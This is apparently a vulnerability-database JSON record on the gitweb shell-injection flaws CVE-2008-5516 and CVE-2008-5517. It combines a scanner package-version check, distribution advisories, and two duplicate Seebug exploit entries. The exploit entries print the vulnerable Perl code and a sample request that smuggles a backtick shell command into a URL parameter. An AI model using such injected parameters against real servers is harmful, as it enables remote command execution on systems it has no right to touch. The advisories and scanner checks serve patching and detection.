rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl0.9.7-dbg\", ver:\"0.9.7k-3.1etch2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl0.9.7\", ver:\"0.9.7k-3.1etch2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl0.9.8-dbg\", ver:\"0.9.8c-4etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssl\", ver:\"0.9.8c-4etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8c-4etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-doc\", ver:\"4.2.2.p4+dfsg-2etch1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-simple\", ver:\"4.2.2.p4+dfsg-2etch1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-refclock\", ver:\"4.2.2.p4+dfsg-2etch1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntpdate\", ver:\"4.2.2.p4+dfsg-2etch1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp\", ver:\"4.2.2.p4+dfsg-2etch1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind9-doc\", ver:\"9.3.4-2etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lwresd\", ver:\"9.3.4-2etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbind9-0\", ver:\"9.3.4-2etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libisccfg1\", ver:\"9.3.4-2etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libisccc0\", ver:\"9.3.4-2etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libisc11\", ver:\"9.3.4-2etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind9\", ver:\"9.3.4-2etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblwres9\", ver:\"9.3.4-2etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdns22\", ver:\"9.3.4-2etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind9-host\", ver:\"9.3.4-2etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbind-dev\", ver:\"9.3.4-2etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dnsutils\", ver:\"9.3.4-2etch4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"hplip-data\", ver:\"2.7.7.dfsg.1-0ubuntu5.3\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"hplip-doc\", ver:\"2.7.7.dfsg.1-0ubuntu5.3\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"hplip-gui\", ver:\"2.7.7.dfsg.1-0ubuntu5.3\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"hpijs-ppds\", ver:\"2.7.7+2.7.7.dfsg.1-0ubuntu5.3\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"hpijs\", ver:\"2.7.7+2.7.7.dfsg.1-0ubuntu5.3\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"hplip-dbg\", ver:\"2.7.7.dfsg.1-0ubuntu5.3\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"hplip\", ver:\"2.7.7.dfsg.1-0ubuntu5.3\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnss3-dev\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxul-common\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmozjs-dev\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxul-dev\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libsmjs1\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmozillainterfaces-java\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnspr4-dev\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libsmjs-dev\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxul0d-dbg\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnss3-0d\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"spidermonkey-bin\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnss3-tools\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnspr4-0d-dbg\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-gnome-support\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-xpcom\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxul0d\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnspr4-0d\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmozjs0d\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnss3-0d-dbg\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmozjs0d-dbg\", ver:\"1.8.0.15~pre080614i-0etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"netatalk\", ver:\"2.0.3-4+etch1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tar\", ver:\"1.15.1-2ubuntu2.3\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tar\", ver:\"1.18-2ubuntu1.1\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T16:02:42", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-67749", "id": "SSV:67749", "title": "gitWeb 1.5.2 - Remote Command Execution", "type": "seebug", "sourceData": "\n # Exploit Title: gitWeb remote command execution\r\n# Date: 2009.06.19\r\n# Author: S2 Crew [Hungary]\r\n# Software Link: -\r\n# Version: GIT 1.5.2\r\n# Tested on: debian linux, GIT 1.5.2\r\n# CVE: CVE-2008-5516 - CVE-2008-5517\r\n\r\n# Code:\r\n\r\n# The cgi script doesn't show the command output *blind command execution ;)*\r\n# Vulnerable functions in gitweb.cgi: git_snapshot(), git_search(), git_object()\r\n\r\n\r\nsub git_object {\r\n # object is defined by:\r\n # - hash or hash_base alone\r\n # - hash_base and file_name\r\n my $type;\r\n\r\n # - hash or hash_base alone\r\n if ($hash || ($hash_base && !defined $file_name)) {\r\n my $object_id = $hash || $hash_base;\r\n\r\n my $git_command = git_cmd_str();\r\n open my $fd, "-|", "$git_command cat-file -t $object_id 2>/dev/null"\r\n or die_error('404 Not Found', "Object does not exist");\r\n $type = <$fd>;\r\n chomp $type;\r\n close $fd\r\n or die_error('404 Not Found', "Object does not exist");\r\n\r\n # - hash_base and file_name\r\n\r\n# Example\r\nhttp://server/cgi-bin/gitweb.cgi?p=sample.git/.git;a=object;f=program.c;h=e69de29bb2d1d6434b8b29ae775ad8c2e48c5391|`touch$IFS/tmp/file.txt`|;hb=9adaf5b35bb6415497d23f089660567227ea3785\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-67749"}, {"lastseen": "2017-11-19T18:14:18", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2010-02-19T00:00:00", "published": "2010-02-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19134", "id": "SSV:19134", "title": "gitWeb v1.5.2 Remote Command Execution", "type": "seebug", "sourceData": "\n # Exploit Title: gitWeb remote command execution\r\n# Date: 2009.06.19\r\n# Author: S2 Crew [Hungary]\r\n# Software Link: -\r\n# Version: GIT 1.5.2\r\n# Tested on: debian linux, GIT 1.5.2\r\n# CVE: CVE-2008-5516 - CVE-2008-5517\r\n \r\n# Code:\r\n \r\n# The cgi script doesn't show the command output *blind command execution ;)*\r\n# Vulnerable functions in gitweb.cgi: git_snapshot(), git_search(), git_object()\r\n \r\n \r\nsub git_object {\r\n # object is defined by:\r\n # - hash or hash_base alone\r\n # - hash_base and file_name\r\n my $type;\r\n \r\n # - hash or hash_base alone\r\n if ($hash || ($hash_base && !defined $file_name)) {\r\n my $object_id = $hash || $hash_base;\r\n \r\n my $git_command = git_cmd_str();\r\n open my $fd, "-|", "$git_command cat-file -t $object_id 2>/dev/null"\r\n or die_error('404 Not Found', "Object does not exist");\r\n $type = <$fd>;\r\n chomp $type;\r\n close $fd\r\n or die_error('404 Not Found', "Object does not exist");\r\n \r\n # - hash_base and file_name\r\n \r\n# Example\r\nhttp://server/cgi-bin/gitweb.cgi?p=sample.git/.git;a=object;f=program.c;h=e69de29bb2d1d6434b8b29ae775ad8c2e48c5391|`touch$IFS/tmp/file.txt`|;hb=9adaf5b35bb6415497d23f089660567227ea3785\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-19134"}], "debian": [{"lastseen": "2019-05-30T02:22:11", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1708-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJanuary 19, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : git-core\nVulnerability : shell command injection\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-5516 CVE-2008-5517\nDebian Bug : 512330\n\nIt was discovered that gitweb, the web interface for the Git version\ncontrol system, contained several vulnerabilities:\n\nRemote attackers could use crafted requests to execute shell commands on\nthe web server, using the snapshot generation and pickaxe search\nfunctionality (CVE-2008-5516).\n\nLocal users with write access to the configuration of a Git repository\nserved by gitweb could cause gitweb to execute arbitrary shell commands\nwith the permission of the web server (CVE-2008-5517).\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.4.4.4-4+etch1.\n\nFor the unstable distribution (sid) and testing distribution (lenny),\nthe remote shell command injection issuei (CVE-2008-5516) has been fixed\nin version 1.5.6-1. The other issue will be fixed soon.\n\nWe recommend that you upgrade your Git packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4.orig.tar.gz\n Size/MD5 checksum: 1054130 99bc7ea441226f792b6f796a838e7ef0\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4-4+etch1.diff.gz\n Size/MD5 checksum: 88583 47033ef17360b441eb508094a3ab6b2b\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4-4+etch1.dsc\n Size/MD5 checksum: 1097 b907083d358ff2dc892790569fe3a164\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/g/git-core/gitweb_1.4.4.4-4+etch1_all.deb\n Size/MD5 checksum: 89094 1dc1b790f989600d62ba2d347d890a43\n http://security.debian.org/pool/updates/main/g/git-core/git-daemon-run_1.4.4.4-4+etch1_all.deb\n Size/MD5 checksum: 55504 7d1a4bf7bf17f179f94f513fc56f1ffc\n http://security.debian.org/pool/updates/main/g/git-core/git-svn_1.4.4.4-4+etch1_all.deb\n Size/MD5 checksum: 100426 149f0e2dda76e4d7613200d530db9e67\n http://security.debian.org/pool/updates/main/g/git-core/gitk_1.4.4.4-4+etch1_all.deb\n Size/MD5 checksum: 99598 800ea1d003baf1e348fda3b661fc16ed\n http://security.debian.org/pool/updates/main/g/git-core/git-doc_1.4.4.4-4+etch1_all.deb\n Size/MD5 checksum: 453076 4d102f5051116516cf4cc45b10637871\n http://security.debian.org/pool/updates/main/g/git-core/git-email_1.4.4.4-4+etch1_all.deb\n Size/MD5 checksum: 62792 201df12660ca0b6180e5fa3c5e0a3543\n http://security.debian.org/pool/updates/main/g/git-core/git-arch_1.4.4.4-4+etch1_all.deb\n Size/MD5 checksum: 68508 1489a2af3d016ff8b1a4c612365870b8\n http://security.debian.org/pool/updates/main/g/git-core/git-cvs_1.4.4.4-4+etch1_all.deb\n Size/MD5 checksum: 94516 afef0aca9b13d1d50af28cbb0d9cc1aa\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4-4+etch1_alpha.deb\n Size/MD5 checksum: 3101926 6422c5ad17a7248820c3c27195051b0c\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4-4+etch1_amd64.deb\n Size/MD5 checksum: 2642144 b81b341dce9b234eb193d40decd1283b\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4-4+etch1_arm.deb\n Size/MD5 checksum: 2322772 d5c371c8f6f3923edaf880df795870e4\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4-4+etch1_hppa.deb\n Size/MD5 checksum: 2693958 c519a9e4cfeda0f11fe92e23756c6759\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4-4+etch1_i386.deb\n Size/MD5 checksum: 2340718 94abafaa8e010240a6a2da50ca717217\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4-4+etch1_ia64.deb\n Size/MD5 checksum: 3815660 9b0970058eecaf9abd12e5cc472d0434\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4-4+etch1_mips.deb\n Size/MD5 checksum: 2784146 b345d0ffd96b307025924f99fed33e9e\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4-4+etch1_mipsel.deb\n Size/MD5 checksum: 2801244 7067901dea12981db4f09e186888e5b3\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4-4+etch1_powerpc.deb\n Size/MD5 checksum: 2638996 23afd3d0fc61699d0850793c2dbd0047\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4-4+etch1_s390.deb\n Size/MD5 checksum: 2628016 8f29e9b8b465bf570e8ee7bf78e3437d\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/g/git-core/git-core_1.4.4.4-4+etch1_sparc.deb\n Size/MD5 checksum: 2301444 93f43ba8edfb78438a6d7d66b96e4816\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2009-01-19T20:53:57", "published": "2009-01-19T20:53:57", "id": "DEBIAN:DSA-1708-1:70883", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00015.html", "title": "[SECURITY] [DSA 1708-1] New Git packages fix remote code execution", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:04", "bulletinFamily": "unix", "description": "### Background\n\nGIT - the stupid content tracker, the revision control system used by the Linux kernel team. \n\n### Description\n\nMultiple vulnerabilities have been reported in gitweb that is part of the git package: \n\n * Shell metacharacters related to git_search are not properly sanitized (CVE-2008-5516). \n * Shell metacharacters related to git_snapshot and git_object are not properly sanitized (CVE-2008-5517). \n * The diff.external configuration variable as set in a repository can be executed by gitweb (CVE-2008-5916). \n\n### Impact\n\nA remote unauthenticated attacker can execute arbitrary commands via shell metacharacters in a query, remote attackers with write access to a git repository configuration can execute arbitrary commands with the privileges of the user running gitweb by modifying the diff.external configuration variable in the repository and sending a crafted query to gitweb. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll git users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-util/git-1.6.0.6\"", "modified": "2009-03-09T00:00:00", "published": "2009-03-09T00:00:00", "id": "GLSA-200903-15", "href": "https://security.gentoo.org/glsa/200903-15", "type": "gentoo", "title": "git: Multiple vulnerabilties", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "slackware": [{"lastseen": "2019-05-30T07:37:20", "bulletinFamily": "unix", "description": "New git packages are available for Slackware 12.0, 12.1, 12.2, and -current to\nfix security issues.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3546\n\nThere are other security issues related to gitweb, which Slackware does not\nship, but could be added to a Slackware install. These problems are also\nfixed with this update. The CVE entries for the gitweb issues may be found\nhere:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5516\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5517\n\n\nHere are the details from the Slackware 12.2 ChangeLog:\n\npatches/packages/git-1.6.1.3-i486-1_slack12.2.tgz: Upgraded to git-1.6.1.3.\n This fixes a vulnerability where running git-diff or git-grep on a hostile\n git repository would result in the execution of arbirary code as the git user.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3546\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/git-1.6.1.3-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/git-1.6.1.3-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/git-1.6.1.3-i486-1_slack12.2.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/d/git-1.6.1.3-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 12.0 package:\n6c6af465722ff0abd8a796305ad4af21 git-1.6.1.3-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\n362ac15da4f60b84b40b1ee0d4b60890 git-1.6.1.3-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\n0766dc7d31229d4af357931a569cf38a git-1.6.1.3-i486-1_slack12.2.tgz\n\nSlackware -current package:\n69183cb0801be615924fc4c870bc9fb8 git-1.6.1.3-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg git-1.6.1.3-i486-1_slack12.2.tgz", "modified": "2009-02-20T17:06:57", "published": "2009-02-20T17:06:57", "id": "SSA-2009-051-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.414289", "title": "git", "type": "slackware", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2019-05-29T17:22:23", "bulletinFamily": "unix", "description": "It was discovered that Git did not properly handle long file paths. If a user were tricked into performing commands on a specially crafted Git repository, an attacker could possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-3546)\n\nIt was discovered that the Git web interface (gitweb) did not correctly handle shell metacharacters when processing certain commands. A remote attacker could send specially crafted commands to the Git server and execute arbitrary code with the privileges of the Git web server. This issue only applied to Ubuntu 7.10 and 8.04 LTS. (CVE-2008-5516, CVE-2008-5517)\n\nIt was discovered that the Git web interface (gitweb) did not properly restrict the diff.external configuration parameter. A local attacker could exploit this issue and execute arbitrary code with the privileges of the Git web server. This issue only applied to Ubuntu 8.04 LTS and 8.10. (CVE-2008-5916)", "modified": "2009-02-18T00:00:00", "published": "2009-02-18T00:00:00", "id": "USN-723-1", "href": "https://usn.ubuntu.com/723-1/", "title": "Git vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
